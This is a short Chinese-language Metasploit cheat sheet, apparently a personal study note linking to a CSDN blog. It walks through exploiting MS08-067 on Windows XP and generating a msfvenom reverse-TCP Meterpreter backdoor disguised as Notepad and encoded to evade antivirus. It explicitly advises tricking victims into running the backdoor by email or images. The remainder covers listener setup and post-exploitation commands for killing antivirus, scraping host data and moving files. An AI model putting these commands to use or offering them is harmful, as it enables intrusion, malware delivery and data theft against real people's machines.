Metasploit学习
阶段一:初步渗透
GO!
msfconsole
相关漏洞
msf > search platform: windows xp sp3
查看某个漏洞后,查看漏洞详细信息
msf > info exploit/windows/smb/ms08_067_netapi
选中漏洞
msf > use exploit/windows/smb/ms08_067_netapi > set payload windows/meterpreter/bind_tcp > set RHOST 192.168.0.108 (设置目标主机IP地址) > exploit 如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。
阶段二:后渗透(后门控制)
在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙,使用加密试图躲过杀毒软件。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe 如果不能运行换用其他加密方式。
查看帮助
man msfvenom
启动msfconsole并
use exploit/multi/handler set LHOST 192.168.0.112 set LPORT 4445 set payload windows/meterpreter/reverse_tcp show options exploit 等待受害者启动后门程序
阶段一补充
显示内建的文档
msf > help
msf > help search
查看可以利用的模块
msf > show msf > show auxiliary msf > show exploits msf > show payloads msf > show encoders msf > show nops
搜索可以利用的漏洞
msf > search type:exploit msf > search CVE-xxxx-xxx msf > search cve:2014 msf > search name:wordpress msf > search name:mysql msf > search path:scada msf > search platform:aix msf > search type:post msf > search windows type:exploit
使用一个漏洞
msf > use exploit/path/to/exploit_name
设置payload
msf > show payloads msf > set payload path/to/payload
入侵
msf > exploit
阶段二补充
运行靶机shell
meterpreter > shell
从目标主机shell退出到 meterpreter
exit
从 meterpreter 退出到MSF框架
background
查看获得的shell
sessions -l
切换到id为1的shell
session -i 1
拿到shell后第一时间关掉目标杀毒软件
run killav
查看目标主机信息
sysinfo
将目标机器上的常见信息收集起来然后下载保存在本地
run scraper
访问文件系统
cd:切换目标目录;
cat:读取文件内容;
rm:删除文件;
edit:使用vim编辑文件
ls:获取当前目录下的文件;
mkdir:新建目录;
rmdir:删除目录;
上传/下载文件
upload/download file
https://blog.csdn.net/qq_36119192/article/details/83215257#%E5%90%8E%E6%B8%97%E9%80%8F%E6%88%AA%E6%96%AD%C2%A0